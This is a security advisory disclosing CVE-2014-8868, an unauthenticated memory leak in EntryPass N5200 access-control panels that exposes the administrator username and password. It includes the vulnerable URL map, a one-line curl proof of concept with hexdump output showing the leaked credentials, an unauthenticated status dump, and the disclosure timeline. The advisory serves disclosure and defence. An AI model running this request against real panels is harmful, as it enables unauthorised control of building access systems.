EntryPass N5200 Credentials Disclosure
EntryPass N5200 Active Network Control Panels allow the unauthenticated downloading of information that includes the current administrative username and password.
Details
- Product: EntryPass N5200 Active Network Control Panel
- Affected Versions: unknown
- Fixed Versions: not available
- Vulnerability Type: Information Disclosure, Credentials Disclosure
- Security Risk: high
- Vendor URL:
http://www.entrypass.net/w3v1/products/active-network/n5200
- Vendor Status: notified
- Advisory URL:
https://www.redteam-pentesting.de/advisories/rt-sa-2014-011
- Advisory Status: published
- CVE: CVE-2014-8868
- CVE URL:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8868
Introduction
“EntryPass Active Networks are designed to enhance highly customized and rapid ‘real-time’ changes to the underlying network operation. Brilliantly engineered with all the power you need to enable code-sending, minus unnecessary buffer time with its distributed architecture capable of processing access demand at the edge level without leveraging at the server end.”
(From the vendor’s home page)
More Details
EntryPass N5200 Active Network Control Panels offer an HTTP service on TCP port 80. It appears that only the first character of a requested URL’s path is relevant to the web server. For example, requesting the URL
http://example.com/1styles.css
yields the same CSS file as requesting the following URL:
http://example.com/1redteam
By enumerating all one-character long URLs on a device, it was determined that URLs starting with a numeric character are used by the web interface, as listed in the following table:
URL | |
---|---|
http://example.com/0 | Index |
http://example.com/1 | Stylesheet |
http://example.com/2 | Authentication with Username/Password |
http://example.com/3 | Session Management |
http://example.com/4 | Device Status |
http://example.com/5 | Progressbar Image |
http://example.com/6 | Reset Status |
http://example.com/7 | Login Form |
http://example.com/8 | HTTP 404 Error Page |
http://example.com/9 | JavaScript |
For URLs starting with non-numeric characters, an HTTP 404 - Not Found error page is normally returned. Exceptions to this rule are URLs starting with the lower case letters o to z and the upper case letters A to D. When requesting these URLs, memory contents from the device appear to be returned in the server’s HTTP response.
As highlighted in the following listing, both the currently set username
ADMIN and the corresponding password 123456 are disclosed in the memory
contents when requesting the URL http://example.com/o
:
$ curl -s http://example.com/o | hexdump -C | head
[...]
0010 XX XX XX XX XX XX XX XX XX XX XX 77 77 77 2e 65 |XXXXXXXXXXXwww.e|
0020 6e 74 72 79 70 61 73 73 2e 6e 65 74 00 00 00 00 |ntrypass.net....|
[...]
0060 XX XX XX XX XX XX XX XX XX XX 41 44 4d 49 4e 26 |XXXXXXXXXXADMIN&|
0070 20 20 31 32 33 34 35 36 26 20 XX XX XX XX XX XX | 123456& XXXXXX|
[...]
These credentials grant access to the administrative web interface of the device when using them in the regular login form.
Similarly, it is possible to get the status output of the device without prior authentication by simply requesting the following URL
http://example.com/4
The server responds to the request with the following XML data, which contains information about various different settings of the device.
<html>
<head>
<title>Device Server Manager</title>
</head>
<body>
<serial_no>XXXXXXXXXXXX-XXXX</serial_no>
<firmware_version>HCB.CC.S1.04.04.11.02 -N5200[64Mb]</firmware_version>
<mac_address>XX-XX-XX-XX-XX-XX</mac_address>
<disable_reporting>disabled</disable_reporting>
<commit_setting>checked</commit_setting>
<user_id>ADMIN</user_id>
<user_pass>******</user_pass>
[...]
</body>
</html>
Proof of Concept
$ curl -s http://example.com/o | hexdump -C | head
Workaround
Access to the web interface should be blocked at the network layer.
Fix
Not available.
Security Risk
Attackers with network access to an EntryPass N5200 Active Network Control Panel can retrieve memory contents from the device. These memory contents disclose the currently set username and password needed to access the administrative interface of the device. Using these credentials, it is possible to read the device’s current status and configuration, as well as modify settings and install firmware updates.
With regards to the device itself, this vulnerability poses a high risk, as it allows attackers to gain full control. The actual operational risk depends on how the device is used in practice.
Timeline
- 2014-05-19 Vulnerability identified
- 2014-08-25 Customer approved disclosure to vendor
- 2014-08-27 Vendor contacted, security contact requested
- 2014-09-03 Vendor contacted, security contact requested
- 2014-09-15 Vendor contacted, vulnerability reported
- 2014-09-17 Update requested from vendor, no response
- 2014-10-15 No response from vendor. Customer discontinued use of the
product and approved public disclosure - 2014-10-20 Contacted vendor again since no fix or roadmap was provided.
- 2014-10-28 CVE number requested
- 2014-11-14 CVE number assigned
- 2014-12-01 Advisory released
RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.
More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de.